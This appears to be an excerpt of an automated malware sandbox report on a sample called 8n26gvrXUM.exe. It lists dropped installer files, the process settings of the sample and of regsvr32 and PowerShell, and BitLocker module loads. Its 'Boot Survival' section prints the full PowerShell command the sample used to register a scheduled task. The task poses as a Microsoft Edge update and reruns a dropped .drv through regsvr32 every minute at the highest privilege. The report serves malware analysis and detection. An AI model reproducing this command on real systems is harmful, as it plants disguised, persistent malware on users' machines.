Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	File created: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	File created: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\is-O7IBF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Roaming\is-66O79.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_setup64.tmp	Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8n26gvrXUM.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
